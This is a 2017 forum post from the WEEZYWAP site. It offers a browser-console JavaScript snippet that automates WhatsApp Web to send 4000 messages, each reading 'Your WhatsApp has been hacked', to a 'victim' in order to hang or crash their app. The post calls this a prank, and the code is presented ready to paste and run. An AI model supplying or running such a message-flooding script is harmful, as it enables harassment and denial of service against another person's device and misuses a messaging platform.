XtGem Forum catalog

p _ x
Bookmark Weezywap
JarApkBmkOpera
(GMT+1)
Thursday March 28th 2024
+
Always Post weezywap.xtgem.com on your facebook, twitter, 2go, whatsapp and instagram status! If you love WEEZYWAP and enjoy unlimited services here!
»WEEZYWAP Forum
Forum Rules | Smilies | BB Codes | Back
* Weezy Lots of messages can hang and even crash WhatsApp, when they are lots (like, in 1000s). Here we are going to bombard victim's WhatsApp with 4000 messages. So, if you want to do this prank with your friend, open your WhatsApp in Chrome. press CTRL + SHIFT + J (to open console) and paste this script inside it:
// control + shift + j to open console and paste<br/>
var count = 4000; //number of times to send<br/>
var message = &#8220;Your WhatsApp has been hacked &#8220;; //spam message<br/>
var i = 0;var timer = setInterval(function() {<br/>
 var evt = document.createEvent(&#8220;TextEvent&#8221;);<br/>
 evt.initTextEvent(&#8220;textInput&#8221;, true, true, window, message + i, 0, &#8220;en-US&#8221;);<br/>
 document.querySelector(&#8220;.input-container .input&#8221;).focus();<br/>
 document.querySelector(&#8220;.input-container .input&#8221;).dispatchEvent(evt);<br/>
 i++;if (i == count)clearInterval(timer);console.log(i + &#8221; messages sent&#8221;);var event = new MouseEvent(&#8216;click&#8217;, {&#8216;view&#8217;: window,&#8217;bubbles&#8217;: true,&#8217;cancelable&#8217;: true});document.querySelector(&#8220;.icon.btn-icon.icon-send&#8221;).dispatchEvent(event);}, 10);

Copy code

After pasting this script, hit ENTER and it will start sending the message "Your WhatsApp has been hacked" to the target victim and won't stop before 4000.
2017-03-05 23:55 · (0)

Online: Guests: 1

Translate
Pages
Copyright © 2024 WEEZYWAP
facebook twitter whatsapp google plus
Home | About Us | Advertise | Frequently Asked Question | Contact Us | Partners | Disclaimer | Terms of Services | Invite Friends | Credits



Online: 1 , Today: 298, Hits: 7568537
Last modified: 27-08-2018 11:42:51 pm